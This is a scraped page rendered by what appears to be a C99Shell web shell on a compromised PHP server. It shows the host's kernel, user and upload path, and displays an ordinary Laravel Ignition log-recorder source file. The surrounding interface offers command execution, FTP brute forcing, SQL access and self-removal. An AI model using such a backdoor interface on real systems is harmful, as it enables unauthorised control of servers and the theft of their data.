!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/facade/ignition/src/LogRecorder/   drwxr-xr-x
Free 13.25 GB of 57.97 GB (22.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LogRecorder.php (1.86 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Facade\Ignition\LogRecorder;

use 
Illuminate\Contracts\Foundation\Application;
use 
Illuminate\Log\Events\MessageLogged;
use 
Throwable;

class 
LogRecorder
{
    
/** @var \Facade\Ignition\LogRecorder\LogMessage[] */
    
protected $logMessages = [];

    
/** @var \Illuminate\Contracts\Foundation\Application */
    
protected $app;

    
/** @var int|null */
    
private $maxLogs;

    public function 
__construct(Application $app, ?int $maxLogs null)
    {
        
$this->app $app;
        
$this->maxLogs $maxLogs;
    }

    public function 
register(): self
    
{
        
$this->app['events']->listen(MessageLogged::class, [$this'record']);

        return 
$this;
    }

    public function 
record(MessageLogged $event): void
    
{
        if (
$this->shouldIgnore($event)) {
            return;
        }

        
$this->logMessages[] = LogMessage::fromMessageLoggedEvent($event);

        if (
is_int($this->maxLogs)) {
            
$this->logMessages array_slice($this->logMessages, -$this->maxLogs);
        }
    }

    public function 
getLogMessages(): array
    {
        return 
$this->toArray();
    }

    public function 
toArray(): array
    {
        
$logMessages = [];

        foreach (
$this->logMessages as $log) {
            
$logMessages[] = $log->toArray();
        }

        return 
$logMessages;
    }

    protected function 
shouldIgnore($event): bool
    
{
        if (! isset(
$event->context['exception'])) {
            return 
false;
        }

        if (! 
$event->context['exception'] instanceof Throwable) {
            return 
false;
        }

        return 
true;
    }

    public function 
reset(): void
    
{
        
$this->logMessages = [];
    }

    public function 
getMaxLogs(): ?int
    
{
        return 
$this->maxLogs;
    }

    public function 
setMaxLogs(?int $maxLogs): self
    
{
        
$this->maxLogs $maxLogs;

        return 
$this;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0055 ]--